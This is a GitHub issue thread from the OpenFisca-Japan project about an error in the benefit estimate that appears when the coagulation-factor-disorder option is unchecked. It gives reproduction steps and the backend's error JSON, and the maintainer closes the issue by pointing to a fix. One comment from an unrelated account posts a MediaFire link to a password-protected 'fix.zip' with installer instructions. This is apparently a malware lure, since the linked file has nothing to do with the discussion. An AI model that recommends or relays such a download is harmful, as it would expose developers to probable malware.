### ISSUE TITLE
血液凝固因子異常症のチェックを外すと見積もり結果でエラーが発生する

### ISSUE THREAD

**Issue by Syuparn** [project-inclusive/OpenFisca-Japan#321]
### As Is or how to reproduce if it's bug
血液凝固因子異常症のチェックを外した後「見積もる」を行うと `予期せぬエラーが発生しました` となる

### To Be 
見積もり結果が表示される

### Action
（改善のための具体的なアクションを記載）

### Problem

- 再現条件
  - くわしく見積もり
  - 寝泊まりしている地域、年齢、年収を入力
  - 病気がある→感染症→血液凝固因子異常症を選択
  -  血液凝固因子異常症の選択を外す
  - 見積もる

APIリクエストに、バックエンド側に存在しないvariableが設定されているのが原因と思われる

```json
{
    "世帯員": {
        "あなた": {
            "血液凝固因子異常症種別": "You tried to calculate or to set a value for variable '血液凝固因子異常症種別', but it was not found in the loaded tax and benefit system (openfisca-japan@1.2.2). Are you sure you spelled '血液凝固因子異常症種別' correctly? If this code used to work and suddenly does not, this is most probably linked to an update of the tax and benefit system. Look at its changelog to learn about renames and removals and update your code. If it is an official package, it is probably available on <https://github.com/openfisca/openfisca-japan/blob/master/CHANGELOG.md>."
        }
    }
}
```

### Note 

イシューに着手した方は、他コントリビューターと重複を防ぐために着手したことをコメントに記載お願いします

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Syuparn** [comment]
着手します

**Comment by Syuparn** [comment]
修正していたのでクローズ #339
